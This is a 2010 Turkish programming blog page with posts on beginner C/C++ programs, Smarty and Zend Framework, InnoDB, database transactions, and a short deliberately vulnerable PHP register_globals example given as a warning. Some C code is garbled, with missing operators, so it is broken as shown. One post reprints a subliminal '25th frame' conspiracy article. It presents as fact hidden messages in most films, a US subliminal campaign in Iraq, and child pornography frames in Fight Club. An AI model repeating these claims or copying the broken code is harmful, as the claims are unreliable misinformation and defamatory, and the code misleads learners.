twitter
Google Plus
tumblr
rss

Yorumlar Hakkında - Duyuru

Yorumlarda lütfen sallama da olsa bir isim yazın. "Adsız" olarak yazıyorsunuz, sonra birçok kişi adsız olarak birşey soruyor. cevap verirken "@adsız (15 ekim 13:08)'de yazan kişi" diye yazıyorum. Hoş olmuyor :) Eminim isminiz çok güzeldir deyip, sizi konuyla baş başa bırakıyorummm.

28 Ağustos 2010 Cumartesi

C++ da sayi tahmin oyunu (basit)

Arşivde buldum,yeni başlayanlar için gayet iyi bi örnek..

#include
#include
void main()
{
int x=101,y,count=1;
printf("tahmin et=");
scanf("%d",&y);
while(y!=x)
{

if(yx)
{
printf("biraz asagi simdi tahmin et=");
scanf("%d",&y);
count=count+1;

}
}
printf("%d denemeden sonra aklimda tuttugum sayi olan %d i buldun",count,x);

getche();
}


C++ Hesap Makinesi Kodlari (basit)

C++ yeni öğrendiğim zamanlarda yazmıştım,paylaşayım dedim..


#include
#include
main(void)
{
int islem;
float i,j,topla,cikar,carp,bol;
char cevap;
do {

clrscr();
gotoxy(30,9);
printf("ilk sayiyi giriniz:",i);


scanf("%f",&i);
clrscr();
gotoxy(30,9);
printf("diger sayiyi giriniz:",j);
scanf("%f",&j);
clrscr();
gotoxy(30,10);
printf("#############################\n");
gotoxy(30,11);
printf("[1] TOPLAMA\n");
gotoxy(30,12);
printf("[2] CIKARMA\n");
gotoxy(30,13);
printf("[3] CARPMA\n");
gotoxy(30,14);
printf("[4] BOLME\n");
gotoxy(30,15);
printf("#############################\n");topla = i + j;

cikar = i - j;

carp = i * j;
gotoxy(30,16);
printf("Islem Secimi Yapiniz.<1,2,3,4>");
scanf("%d",&islem);
clrscr();
if(islem!=1&&islem!=2&&islem!=3&&islem!=4)
{
gotoxy(30,10);printf("HATA:Yanlis secim.Lutfen Yeniden deneyin.\n",cevap);
}
else{
clrscr();
switch(islem){
case 1: gotoxy(30,17);printf("%f + %f=%f\n\n",i,j,topla);break;
case 2: gotoxy(30,17);printf("%f - %f=%f\n\n",i,j,cikar);break;
case 3: gotoxy(30,17);gotoxy(30,16);printf("%f * %f=%f\n\n",i,j,carp);break;
case 4:
if(j==0){ gotoxy(30,16);
printf("Hata : Bolen sayi [payda!=0] sifir olamaz.\n");}
if(j!=0){ gotoxy(30,16);
bol=i/j;
printf("%f / %f=%f\n",i,j,bol);}

break;
default:printf("HATA:Duzgun Secim Yapmadınız Lütfen Yeniden Deneyin...");
}
}
gotoxy(30,12);printf("Devam edecek misiniz?",cevap);
do {
scanf("%c",&cevap);
}while( cevap == '\n' );
printf("\n");
} while( cevap == 'E' cevap == 'e' );

if(cevap=='h'cevap=='H')
{
return 0;
}

getch();
}


25 Ağustos 2010 Çarşamba

Smarty de Foreach kullanimi

Smarty'e ilk başlarken açıkcası biraz zor görünüyordu ama zamanla farkettim ki,hem pratik hem de kolay bir kullanım yapısı var..

Smarty de Foreach Nasıl kullanılır ?

Bu işle uğraşanlar az çok biliyordur diye,Basitce anlatacağım..


< ?php

$smarty = new Smarty; $smarty->template_dir = "./template/";
$smarty-> compile_dir = "./compile/";
$smarty->assign("isim", "TRouBLeSHooTeR" );
$smarty->assign("ilgi_alanlari", array('internet', 'Bilgisayar',
'php'));
$smarty->display('anasayfa.tpl');
? >anasayfa.tpl de ilgi alanlarımızı göstermek için..
İsim : {$isim}
{foreach from=$ilgi_alanlari item=i}
{$i}
{/foreach}


Bu şekilde, from ile php dosyasından gelen arrayin içeriğini alıyoruz..

22 Ağustos 2010 Pazar

Zend Framework ile Smarty Kullanimi

Zend Framework, polimorfik yapısı ile pek sevdiğimiz bir PHP framework. Kullandığı componentler için sağladığı interface'ler sayesinde, o component'in yaptığı işi, başka bir araç ile yapmak çok kolay oluyor.

Zend'in mevcut template engine'ini pek sevmeyebilirsiniz. Html kodu arasında
Smarty ise gönüllerde taht kurmuş, daha iyi alternatifleri varmış gibi dursa da PHP dünyasında en çok kullanılan template engine.

Bu yazıda, işini iyi yapan bu iki aracın, ortak bir şekilde nasıl kullanılacağınız anlatacağım.

Bunu yapmak için yeniden implemente etmemiz gereken component ise ZendControllerActionHelperViewRenderer 'ı ZendViewAbstract sınıfından türeyen kendi implemente ettiğimiz Smarty sınıfından türeyen bir obje ile değiştireceğiz.

Bunun için aşağıdaki gibi bir sınıf yazabiliriz.

< ?php// Smarty template engine sinificlass Beedon_View_Smarty extends Zend_View_Abstract{/** * smarty objesi */private $_smarty;/** * include Smarty class and set configs */public function init() { require_once ( "burada/smarty/yolunu/veriyoruz/Smarty.class.php" ); $this->_smarty = new Smarty(); //smarty ayarları $this->_smarty->caching = 0; $this->_smarty->cache_lifetime = 0; //bu ayarları değiştirebilrsiniz // Zend view dosyalarının yolunu set ediyoruz $this->_smarty->template_dir = APPLICATION_PATH."/views/scripts"; $this->_smarty->compile_dir = "/tmp/compile"; //derlenen dosyalar $this->_smarty->cache_dir = "/tmp/cache"; //template cache dosyaları}/** * Sayfayı smarty ile render etmeden önce * Zend_View'ın aldigi degiskenleri assign etmeliyiz */public function render($name){ $this->_smarty->assign($this->getVars()); $this->_smarty->display($name);}/** * bu abstract methodu implemente etmeliyiz */protected function _run(){}}


Şimdi hazırladığımız bu sınıftan türeyen bir objeyi, Zend'in view renderer'ı olarak atamak gerekiyor.

Bunun için Bootstrap.php dosyamızın run() methoduna aşağıdaki gibi satırları eklemeliyiz.


public function run(){ //bu isi autoloader'a da yaptırabilirsiniz require_once( "buraya/Beedon_View_Smarty.php/dosyasının/yolu/gelecek"); //kendi view objemiz $view = new Beedon_View_Smarty(); // view renderer'ı set ediyoruz $viewHelper = new Zend_Controller_Action_Helper_ViewRenderer($view); //view dizini icinde aranacak dosya uzantısı, ptl de yapabilirsiniz $viewHelper->setViewSuffix("phtml"); Zend_Controller_Action_HelperBroker::addHelper($viewHelper); //bu islemleri yaptıktan sonra üst sınıfın run() methodunu cagirmayi unutmayın parent::run();}


Artik uygulama dizinimizin icindeki view/scripts dizini içindeki dosyaları Smarty syntax'i ile kullanabiliriz.

Polimorfik yapının sağladığı güzelliklerden birisi de bu işlemlerden sonra

Controller'lar içersinde hiçbir değişiklik yapmamızın gerekmemesi.

21 Ağustos 2010 Cumartesi

Filmlerde 25.Kare Bilincalti Mesajlari


Konu gerçekten çok ilginç.okumanızı tavsiye ederim..

SUBLİMİNAL MESAJLARŞuuraltını etkilemeyi hedefleyen mesajlara “subliminal” adı verilir. Genel olarak “şuuraltına yönelik gizli mesajlar olarak ifade edebiliriz. Kişinin şuuraltına ‘’subliminal’’ mesaj göndermenin birçok yolu bulunuyor.
Bunlardan en çok kullanılanları :
1. Dijital ses dosyalarına gizlenen işitsel yolları.
2. Gözle algılanamayacak kadar kısa süreyle ve sık patlayan flaşlar şeklinde sinema ya da televizyon görüntüsü yoluyla şuur-altına itilen 25. kareler.
3. Reklam afişleri, logoları ve benzeri nitelikteki görsel malzemenin içine saklanmış şekil, kelime ve rakamlar.
Bu yöntem; bir ürünün reklâmını yapmaktan, bir inancın ya da görüşün propagandasını yapmaya, psikolojik savaşa, uluslararası ilişkilere, yanıltıcı bilgilendirmeye kadar varan geniş bir yelpazede kullanılmaktadır. Görsel ve işitsel olarak (şuurlu) algılananlar değil; şuur-altı seviyesinde algılanan söz, resim, görüntü ve şekillerden oluşur.
Bunlardan en çok kullanılanı dijital ses dosyalarına gizlenen ses mesajlardır. Üzerinde oynanabilirliği ve işlenilmesi ve yayılması daha kolay olduğundan MP3 dosyaları gizli mesaj için biçilmiş kaftandır diyebiliriz.
sistem nasıl işliyor?
İnsan kulağı sadece belirli titreşim sıklığı aralıklarındaki sesleri duyabilir. Eğer siz bir müzik parçasını rahatça duyabiliyorsanız, bu sizin duyabileceğiniz titreşim aralığında olduğunu gösterir. İnsan beyninin algısı ise, bundan daha düşük ya da daha yüksek frekansları algılayabilecek kapasitededir. Dikkat ediniz: “duyabilecek” demiyoruz, algılayabilecek diyoruz. Yani, kulağımız ancak belirli bir titreşim aralığındaki sesleri duyabilir. Fakat beynimiz bu aralığın çok daha ötesindeki sesleri algılar, hisseder.
Şuuraltı ve şuuraltının özelliklerini anlattığımız zaman, ne demek istediğimizi çok daha iyi anlayacaksınız. Ancak, şimdi öncelikli olarak bu “subliminal mesajların” (şuur-altı telkinlerin) neler olduğunu ve nasıl işlendiğini sizlere göstermemiz gerekiyor.
8-12 hertz dalga boyundaki Subliminal mesaj içeren bir MP3'ü kulağınızla dinlersiniz, ancak içindeki gizli-mesajı beyniniz dinler. Bu esnada kulağınız hiçbir şey duymaz. İnternette ve paylaşım programlarında şuuraltı mesajları içeren MP3 dosyaları bulunmaktadır. Hatta bu gizli mesajları frekans aralıklarına göre analiz ederek ortaya çıkartan yazılımlar dahi vardır.
Mesela, en korkunç uygulamalardan sadece biri:“Bu Uygulamaya Amerika, Irak’ı işgal etmeden önce bir yıl boyunca (daha fazla da olabilir) devam etti. Irak radyolarında Kur’an yayınının altından, çok düşük bir titreşimde, kulakla duyulmayan, ancak dimağla algılanarak Iraklıların şuur-altına gönderilen: “Direnmeniz faydasız” gibi mesajlar verilmiş ve bir ülke işte bu şekilde şuuraltı mesajlar ile işgale hazır edilmiştir.
25inci KARE
Kişinin şuur-altına subliminal mesaj göndermenin birçok yolu olduğunu söylemiştik. İşte bunlardan bir diğeri de 25inci Kare tekniğidir. Peki, nedir bu 25inci Kare Gördüğümüz bir anlık görüntü: 655 satır ve frame/çerçeve denilen 24 küçücük kareden oluşur.
Sinema şeridinde, saat, dakika, saniye olarak bir diziliş vardır. Her saniyeden sonra bir yabancı kare gelir ve bir saniye 24 karedir. Her 24 kare ise bir ekran büyüklüğündeki kareyi oluşturur. Her 327.5 satırda bir de "control-track" denilen aralık vardır. İşte bu aralıktaki görüntüler kesilip, aralarına başka görüntüler atılarak 25inci kare oluşturulur ve bu son kare olan 25inci kare anlıktır. Yani görüntü saniyede 1/24 olacakken, bu 1/25'e çıkar. Kareler 25 olunca bir anda bir görüntü gelir ve anında kaybolur. Genellikle göz ve beyne görünmez, daha doğrusu görülür ama şuuraltında kalır.
25. karenin temel mantığı da mesajı şuur-altına göndermek olduğu için, artık dünya sinema sanayisinde bu tekniği kullanmayan yok gibidir. Yani sizler evlerinizde rahat koltuklarınıza oturup herhangi bir televizyon kanalındaki herhangi bir dizi/ film ya da bir belgeseli seyrederken aynı zamanda 25 karelerle şuur-altınıza gönderilen mesajlara/ telkinlere/ saldırılara maruz kalabiliyorsunuz.
Göz bunları görmüyor ama saniyenin 3 binde biri gibi bir zaman aralığında bu görüntü şuur-altına ulaşıyor, orada depolanıyor. Bu gizli mesajlar sayesinde, o reklâmı, diziyi, filmi ya da herhangi bir resmi hazırlayan kişi/ yapımcı/ yönetmen kendi hedefine, niyetine ve ideolojisine göre vermek istediği mesajı “25inci Kare”lerle şuuraltına göndermiş oluyor.
PEKİ, GÖREMEDİĞİMİZ HALDE NASIL ETKİLENİYORUZ BU 25inci KARELERDEN?
Bu adamlar zaten açıktan açığa bu işi yapıyorlar. Filmlerle, reklamlarla her türlü mesajı veriyorlar. Buna rağmen niçin böyle gizli bir kare uyguluyorlar?
Cevabı çok basit: Çünkü gördüğümüz zaman bu kadar etkili olmuyor. Çünkü kişi, şuurlu bir tercih ile gördüklerini veya duyduklarını ya ret ediyor ya da kabul ediyor. Çünkü baştan önüne seçenek getirilmiş oluyor.
Fakat bu, öyle bir şey ki insan onu görmüyor, duymuyor ve hissedemiyor, yani bizlerin algı frekanslarımızı n tamamen altında veya üstünde yer alıyor. Böyle bir şeyi kabul yahut ret etme gibi bir imkânımız var mı? Elbette hayır.
İşte 25. karenin ve subliminal reklamların temel mantığı budur! Hedefteki kitlenin şuurlu tercih hakkını gasp ederek, onları gizlice zehirlemek!
ASIL HEDEF ÇOÇUKLAR
Şuur-altı teknolojisi maalesef çizgi filmlerde, şarkılarda, reklam panolarında, filmlerde yasal olmayan bir şekilde kullanılıyor. Çocuklara sevgiyi kardeşliği öğütleyen masum zannettiğimiz çizgi filmlerin arasına pornografik resimler, şiddet unsuru içeren görüntüler bu teknolojiyle saklanıyor. Çocuğumuz fark etmeden o görüntüleri beynine konuk ediyor ve şahsiyetinin oluştuğu o en ciddî yaş dilimde (sıfır-yedi yaş arası) bu görüntüler içeride şuur-altında hapsoluyor. Artık siz siz olun her gördüğünüz ve duyduğunuza çok dikkat edin.
Özellikle Disney, yaptığı çizgi filmlerde cinsellik temasını yıllardır çocuklarımızın şuur-altına kazımıştır. “BU FİLMDE / DİZİDE SANAL REKLÂM UYGULANMAKTADIR” Sizler, televizyonlarınızın karşısında uyumaya devam eden ruhlar, koltuğunuza oturup en sevdiğiniz dizi ya da filmleriniz yayına başlarken: “ BU FİLMDE / DİZİDE SANAL REKLÂM UYGULANMAKTADIR” uyarısını görmediğinizi söyleyebilir misiniz?
Peki, ne demek “Sanal Reklam?”
Sanayi Bakanlığına göre sanal reklamın tarifi aşağıdaki gibi :
"Sanal reklam"; hukuken kullanımı meşru görüntülerin, canlı veya banttan bilgisayar marifeti ile manipülâsyonu ve söz konusu görüntülerde yer alan muhtelif unsurları reklam amacı ile hâlihazırda kullanılan veya ileride geliştirilecek teknolojiler vasıtasıyla oyun sahası ve çevresi üzerine düşürülen tüm görüntüleridir.” Televizyonda izlediğimiz pek çok dizide ya da filmde ya marka yerleştirme ya da sanal reklam uygulamaları ile karşılaşıyoruz. Bir dönem gişe rekorları kıran “Kurtlar Vadisi Irak” filmini hatırlayın. Film başlarken “Bu filmde sanal reklam uygulaması yapılmaktadır” uyarısı vardı. Ekranda bir ovada yol alan otomobili izlerken birden bir mimarlık firmasının reklam tabelası ve bir apartman beliriveriyor. Kerpiç evlerin üstüne getirilmek istenmiş ama başarılı olunamadığı için ortalık yerde duran uydu antenleri reklamları ve uyarı tabelalarının altında beliriveren markalar…
O halde en can alıcı soru şu: Niçin sanal reklam?
Çünkü şuur-altına telkin göndermenin en iyi yoludur da ondan.
25. Kare'nin uygulandığı bir film :

DÖVÜŞ KULÜBÜ / The Fight Club Niçin bu film?
Bir kere adına bakarak bunun bir dövüş filmi olduğunu zannetmeyin. “Gün gelir sahip olduklarınız, size sahip olmaya başlar!” sloganı ile modern insanın tüketim merkezli hayat tarzını sorgulayan bir filmdir düğüş kulübü.
Edward Norton ve Brad Pitt’in başrollerini paylaştığı ve David Fincher’in yönettiği bu film, 2000 yılında Empire Ödülü (İngiltere)aldı. Ayrıca 2001’de En iyi DVD, en iyi DVD anlatımı, en iyi DVD özel içerikleri ödülünü almış ve 2005 yılında Total Film magazin ödüllerinde (UK) “Dünyanın bu güne kadar gelmiş geçmiş en iyi film ödülü” ne lâyık görülmüştür.
Gerçekten çok etkileyici bir filmdir. Moderniteye karşı çıkarak :
“Gün gelir sahip olduklarınız, size sahip olmaya başlar” “Her şeyi kontrol etmeyi bırak ve rahat ol…” “Nefret ettiğiniz işlerde çalışıp gereksiz şeyler alıyorsunuz.” “Seyrettiğiniz reklâmlar yüzünden araba ve kıyafet değiştiriyorsunuz.” “Sizler paranız kadar iyisiniz.” “Siz işiniz değilsiniz…” “Bindiğiniz araba değilsiniz..” “Kredi kartlarınızın limiti değilsiniz” diyordu.
Şimdi, “Dünyanın bugüne kadar gelmiş geçmiş en iyi film Ödülü”ne lâyık görülen bu filmdeki 25inci kareleri yakalayabilmek ve filmdeki her saniyeyi kare-kare izleyebilmek için önce:
1. Filmi bilgisayarınıza kaydedin.
2. Media player ile izlerken film sahnelerini 1/16 “Slow / yavaş” izleme modunda.
3. “klcodec” ile izlerken alttaki ok işaretlerinden “Decrease Speed”e üç kez tıklayıp filmi en yavaş haline getirmeniz gerekmektedir. Böylece her saniyeyi yaklaşık 5 saniyede izleyecek ve her kareyi tek-tek yakalayabileceksiniz.
SONUÇ:
1. Araştırmalarımızın sonucunda filmin yönetmeninin (sexomaniac) olduğunu bulduk.
2. Filmin (bizim yakalayabildiğimiz) 26 farklı yerinde 25inci kareler kullanılmış.
3. 25inci Kare tekniği ile elinde sigara olan Brat Pitt resmi filmin çeşitli yerlerine yerleştirilmiştir.
4. Yönetmen filmin 2 farklı yerinde 25inci kare tekniği ile erkek cinsel organını yerleştirmiş.
5. Yine filmin 2 yerinde Çocuk Pornosu şuur-altına yerleştirilmiş.
6. Unutmayın 25. karelerin yer aldığı her film gibi bu filmde de normal seyrinde görülmesi gerekenlerin dışında hiçbir şey görülmüyor. Aslında çok şey görülüyor ancak hiç kimse ne gördüğünü bilmiyor.
7. Uyanmayanlar ve hâlâ 25. karenin varlığına ihtimal vermeyenler, denesin ve görsün diye filmdeki en can alıcı karelerin sadece bir kısmının dakika ve saniyelerini aşağıya sırasıyla yazıyoruz. İsteyen filmdeki tespit ettiğimiz bu dakika ve saniyelerde filmi durdurup kare-kare izleyebilir.
06:02= elinde sigara olan Brat Pitt resmi,
31:07 = cinsel öğeler erkek cinsel organı,
31:14 = cinsel öğeler,
46:41 =cinsel öğeler,
49:09 = cinsel öğeler,
50:42 ile 50:52 = çocuk pornosu mesajları…
02:10:39= Film bitiyor binalar yıkılıyor ve yine erkek cinsel organı filmin finali olarak 25. karede yer alıyor.

ayrıca tyler'ın gözüktüğü 4 kare burda:
http://img91.imageshack.us/my.php?image=bscap0074zu1.jpg http://img12.imageshack.us/my.php?image=bscap0073uq8.jpg http://img22.imageshack.us/my.php?image=bscap0075vi2.jpg http://img27.imageshack.us/my.php?image=bscap0076vx3.jpg
Filmin en tuhaf gelen bölümü ise Tayler’in işi sabun imalatçılığı olmasına rağmen, 30uncu dakikadan itibaren, Tayler’i anlatırken onun bir sinema yapımcısı olduğunu anlatmasıdır. (Filmin sadece bu 2 dakikalık bölümünde Tayler bir sinema yapımcısıdır)
Şu ifadeler 30uncu dakikadan sonra aynen filmde geçmektedir :
“Sinema filmleri tek bir makarada olmaz; birkaç makarada olur ve bir kare bittiğinde diğer makaraya geçerken birisinin düğmeye basması gerekir. O an geldiği zaman projektörleri değiştirir ve film devam ettiği için kimse bir şey anlamaz.
KİMSE GÖRDÜĞÜNÜ BİLMİYOR AMA GÖRÜYOR” der ve sorar: “ACABA KAÇINIZ ONU İŞ BAŞINDA YAKALAYA BİLİRSİNİZ?”
DİKKAT: Yaptıkları işi aynı filmde anlatıyorlar!
ŞUUR-ALTI VE GENEL ÖZELLİKLERİ

Günlük hayatımızda yaşadığımız bazı sorunların şuur-altımızdan kaynaklandığını hep söyleriz ama acaba kaçımız şuur-altımızın gücünün ve öneminin farkındayız?
Şuur-altı çoğumuzun bildiği ya da duyduğu bir kavramdır. Bu kavram şuurumuzun farkında olmadığı ama davranışlarımızın yönlendirilmesinde önemli rol oynayan bir yapıyı belirtiyor. Şuur-altı, alt-benlik, şuur-dışı olarak da adlandırılan şuur-altı kişiliğimizin farkında olmadığımız, denetimimiz dışındaki parçasını temsil etmektedir. Diğer bir deyişle bu, buzdağının görünmeyen kısmıdır.
Otomatik bir pilot gibi bütün tecrübelerimizi depolar. Bir hafıza deposudur. Tecrübelerinizi hatıralar şeklinde depolar. Şuur-altı heyecanlarımızı, sezgilerimizi, alışkanlıklarımızı ve güdülerimizi depoladığı gibi, bunların faaliyete dökülmesinden de sorumludur.
Şuuraltımız, zihin telkin yoluyla ikna olunmaya müsaittir.
Şuurlu zihnin aksine, sorgulamadan tekrarla gelen teklifleri kabul eder, pekiştirir.
Bütün otomatik davranışlarımız, alışkanlıklarımız ve heveslerimiz hafızada kayıtlı bilgiler arasındadır.
Şuur-altı zihin delillerle ne ikna edilebilir, ne de aldatılabilir. Fikirlere ve imajlara karşılık verir. Şuur-altının en mühim özelliği ise: şuurumuzun farkına varmadığı olayları, sesleri, resimleri kaydetmesidir. Siz 5 katlı bir binaya çıkarken merdivenleri saymıyorsunuz ama şuur-altınızda bu sayı biliniyor ve kaydediliyor. Aynı şekilde bebekliğimize dair hatıralar şuur-altı kayıtlarının arasında bulmak pekâlâ mümkündür.
Şuur ise aynı anda 3 ilâ 7 işi yapabilir. Daha fazla görev yüklendiğinde kilitlenir. Bu yüzden dikkatimizi yönlendirmediğimiz, bizi o anda ilgilendirmeyen birçok veri bu filtreden süzülür. Beş duyumuzun karşılaştığı çok sayıda duyum, algılanmadan şuur-altı hafıza deposuna aktarılır. Demek ki duyduğumuz, gördüğümüz ama kavrayış olarak algılayamadığımız her şey şuur-altına ileride tekrar kullanılmak üzere veri olarak depolanır ve gelecekteki hareketlerimize yön çizer.
İşte tam da bu aşamada şuura değil ama şuur-altına hitap eden bütün propaganda ve veriler, bizim davranışlarımıza yön çizen güdüler olarak karşımıza çıkar. Zira sıklık arz eden tekrarlar derin algılarımıza yöneliktir.

20 Ağustos 2010 Cuma

Blogumda Tema degisikligi

Evet bugun itibari ile (20.08.2010) blogumun temasını değiştirdim.
Neden değiştirdim ?
-Default bir temaydı
-Blog yerleşimi olarak dardı(genişletince de bişiye benzemedi)
-Değişiklik Güzeldir
-Daha güzeli varken neden eskisini kullanayım =)

sebepleri böyle işte benim için..Bundan sonra blogu daha güncel tutmaya çalışacağım.az ama öz konular yazarım sanırım.Böyle saça sapan bilmediği konular hakkında konu açan,forum sitesi gibi sürekli bişiler paylaşan bi blogda olmayacak benim blogum..Farkımız tarzımız olacak yanii =)
İnş tema seçimimi beğenmişşinizdir..
Herkese iyi günler..

17 Ağustos 2010 Salı

InnoDB nasil aktif (enable) edilir ?

InnoDB nasil aktif(enable) edilir ?

my.ini dosyanizi açın "skip-innodb" diye bir satır görürseniz başına # ekleyin,pasif hale getirin yani

# skip-innodb

olacak.sonra o dosyayi kaydedin.

daha sonra sql de
show innodb status


yazarak "Cannot call SHOW INNODB STATUS because skip-innodb is defined" hatası almadığınızdan emin olun

sql de;

ALTER TABLE table_name ENGINE = InnoDB;


yazdıktan sonra

"The 'InnoDB' feature is disabled; you need MySQL built with 'InnoDB' to have it working"

hatasıda almıyorsanız MySQL servisini restart edin.
ALTER TABLE table_name ENGINE = InnoDB;

yazarak tablolarınızı InnoDBye çevirin =)

Transaction Management ne demek ?

● Transaction'ı bir veya daha fazla SQL komutu içeren mantıksal bir birim gibi düşünebiliriz. Önemli olan, bu SQL komutlarının atomik olarak çalıştırılması, yani ya hepsi birlikte gerçekleştirilecek, yada hiçbiri gerçekleştirilmeyecek. bunu "Tek celsede yapılması gereken iş" olarak düşünebilirsiniz. Klasik bir örnek vardır, bu örnek özerinden anlatmak daha kolay: Bankadan para transferi. Para bir hesaptan diğer hesaba aktarılacak, bunun ard arda üç SQL ile yapıldığını düşünelim. Birincisi, ilk hesaptan transfer edilecek mktarı düşüyor, ikincisi ikinci hesaba parayı yatırıyor, üçüncüsü de hesap hareketleri bilgisini kaydediyor olsun. Bu üçü birlikte gerçekleştirilmeli, veya hiç gerçekleşmemeli. Örneğin, parayı ilk hesaptan çekip ikinciye yatırırken hata alırsak, ilk işlem geri alınarak para hesaba geri yatırılmalı. Tabi bu işlemler esnasında, hepsi tamamlanmadan önce hesapların bakiyeleri eski bakiye olarak görünmeli. İşte bir transaction, bu işlemlerin gruplanarak atomikleştirilmesini sağlıyor.

● Oracle'da transaction kullanımı zorunlu, yani Oracle'da tek bir SQL komutu çalıştıracak olsak da bunu bir transaction'ın içinden yaparız. Sunucudan bir oturum açtığımızda(bağlandığımızda) ilk çalıştırılabilir SQL komutumuzla birlikte bir transaction açılır, bu sonlanınca otomatik olarak yeni bir transaction açılır, yeni transaction'un içine gireriz. SQL Server'da bu böyle değildir. Komutlar, kendi içlerinde atomiktir. Yani biz "BEGIN TRANSACTION" komutuyla yeni bir transaction oluşturmazsak, her komut ayrı transactionlar halinde çalışır, SQL komutları birbiri ardına işlenir, ve rollback ile geri alınamaz. Gördüğünüz gibi, bu kadar basit bir durum için bile, en yaygın iki DBMS arasında çok ciddi bir farklılık var. Bu yüzden oracle kullanacaksak Oracle'ın, başka bir veritabanı kullanacaksak onun "Transaction Management" gibi temel konularını öğrenmek zorundayız. Bunları birbirine eşdeğer olarak varsayamayız. Onbinlerce sayfalık dökümantasyonlar da bu yüzden var zaten.

● Bir transaction, aşağıdaki durumlarda sonlanır:

1- Bir COMMIT veya ROLLBACK komutu girilmesi: Bu komutlara ve çalıştırıldığında neler olduğuna daha sonra göz atacağız.
2- Bir DDL komutu (create, drop, rename yada alter) çalıştırılması: Mevcut transaction, DDL komutu çalışmadan önce ve sonra otomatik olarak COMMIT edilir ve yeni bir transaction başlatılır. Bunun iki anlamı var: a) Bir DDL komutu girdiğimizde hata almış da olsak, daha önceki transaction'ımız commit edilmiş olacaktır. b) DDL komutları rollback ile geri alınamaz.
3- Kullanıcının serverla bağlantısının kopması: Bu durumda transaction geri alınır(rollback).
4- Kullanıcı prosesinin anormal şekilde sonlanması: Bu durumda transaction geri alınır.
5- Kullanıcı bağlantısının normal şekilde sonlanması: Bu durum kullanılan uygulamaya göre değişir. SQL*Plus'da mevcut transaction commit edilir. Bazı uygulamaların bu konuda konfigürasyonu vardır, ona göre hareket eder. Uygulamalar, bağlantıyı koparmadan önce mevcut transaction'u mutlaka commit veya rollback etmelidir.

● Commit, transaction içinde işlemen komutların, yapılan değişikliklerin kalıcı hale getirilmesi demektir. Oracle'da, bir transaction başladığında, çalıştırılan komutlar ve etkileri diğer kullanıcılara yansımaz. Diğer kullanıcılar her zaman son commit edilmiş tutarlı veriyi görür. Transaction ile yapılan değişiklikler Data Buffer Cache'e ve redo log'lara yazılır, orjinal veriler ise undo log'lara yazılır. Commit edildiğinde, memory'deki redo log'a commit bilgisi eklenerek, redo log buffer disk'e (redo log dosyalarına) flush'lanır. Bu işlemden sonra fiziksel bir hata dışında (diskin uçması) ne olursa olsun, verimiz commit'lenmiş demektir ve artık rollback ile geri alınamaz. Row'lar üzerindeki locklar bırakılır ve transaction sonlanır. Tüm kullanıcılar artık sadece yeni veriyi görebilir. Daha sonraki ilk çalıştırılabilir SQL komutuyla yeni bir transaction başlatılır.

● Commit, çok kısa süren bir işlemdir. transaction içinde değiştirilen veri yoğunluğuna ve transaction'ın ne kadar uzun sürdüğüne bağlı değildir.

● Rollback, transaction içinde yapılan değişikliklerin iptal edilmesi, geri alınması demektir. Fakat bu yanlış anlaşılmasın, diğer kullanıcılar zaten orjinal veriyi görüyordu. İptal edilen bizim oturumumuzda, bizim transaction'ımızın yaptığı değişikliklerdir. Rollback, bunları hiç yapılmamış gibi iptal eder ve mevcut transaction'u sonlandırır. Rollback komutu girildiğinde, undo bufferdaki bilgiler data buffer'a yazılır. Dolayısıyla, üzerinde değişiklik yapılan veri ne kadar büyükse rollback o kadar uzun sürer. Rollback'in tamamlanma süresi commit'ten fazladır.

● Statement level rollback, SQL komutlarının kendi içinde atomik olması demektir. Bir SQL cümlesi, birden fazla row'da değişikliğe sebep oluyorsa, ya hepsi değiştirilir ya da -bir hatayla karşılaşılması durumunda- hiçbiri değiştirilmez. Bu tür operasyonun otomatik olarak geri alınmasına statement level rollback denir. Bu Oracle tarafından otomatik olarak gerçekleşiyor, bizim elle herhangi bir komut girmemile değil. Örneğin, bir UPDATE komutu 1000 satırı birden update'liyorsa, 600. satırda "Constraint Violation"dan dolay hata almışsak önceki 599 satır da otomatik olarak geri alınır, güncellenmiş halde kalmaz. Bunun gibi, bir komuttan dolayı trigger çalışmış veya prosedür çağrılmışsa, bir hata durumunda o komutun bütün etkileri geri alınır.

● Resumable Transactions, bazı şartlarda bazı hatalardan dolayı yarım kalan transaction'umuza devam edebilmemiz anlamına gelir. Bu şu şekilde olur: Büyük boyutta data ekleyecek veya değiştireceksek, önce o transaction'u resumable olarak belirlersek, transaction içindeki değişiklik enasında 1- Out of space condition, 2- Maximum extents reached condition, 3- Space quota exceeded condition durumlarından biri olursa (kısaca kota aşımı durumu) transaction hata verip işlemi geri almak yerine belirli bir süre bekler. O beklerken kotanın arttırılması gibi olayı kısıtlayan neden ortadan kaldırılırsa işlemini kaldığı yerden tamamlar. İşte bu duruma resumable transaction denir.


bu kadar terim cümlelerden sıkılanlar için biraz daha basitleştirecek olursak..

Transaction türkçe anlamı işlem demektir. Daha küçük parçalara ayrılamayan işlem demektir. Özellike bir grup işlemin arka arkaya gerçekleşmesine rağmen seri işlemler halinde ele alınması gerktiğinde kullanılır. Transaction bloğu içerisindeki işlemlerin tamamı gerçekleşinceye kadar hepsi gerçekleşmemiş varsayılır. Biraz açarasak ya hep ya hiç kuralı ile çalışır. Ya tüm işlemler düzgün olarak gerçekleşir ve geçerli kabul edilir yada bir kısım işlemler yolunda gitse bile, blok sona ermeden bir işlem bile yolunda gitmese hiçbir işlem olmamış kabul edilir.

Örnekleyecek olursak bankadaki bir eft işlemini düşünün, eft yapanın hesabından miktar düşülür eft gidecek yere aktarılır ve işlem gerçekleşmiş olur. Peki bu işlemler ortasında elektirikler kesilirse ne olur? Para eft anında elektirği kesildiğinde transfer ortada kalır alıcını hesabınada geçilmemiş olur. İşte Transaction bloğu içerisindeki işlemlerin tamamı gerçekleşinceye kadar hepsi gerçekleşmemiş olmasına denir.

Php de Register Globals Neden Kapali Olmali ?

register_globals belirteci (directive) PHP 4.2.0 ve üstü sürümlerde ön tanımlı olarak kapalı halde (değeri OFF) gelir. Bu belirtecin açık (değeri ON)olması doğrudan güvenlik açığı oluşturmasa da ciddi bir tehlike oluşturduğundan değerine dikkat edilmesi gereklidir. Uygulamalar bu belirtecin kapalı olması durumuna göre geliştirilmelidir.

Bu belirtecin açık olması neden risklidir?. Bu konuda her seviyeye uygun örnekler bulmak zordur. PHP resmi sitesinde bu konu ile ilgili güzel bir örnek vardır.

code:

< ? if (yetkili_kulanici()) { $authorized= true; } if ($authorized) { include'/cok/onemli/bilgi.php'; } ? >
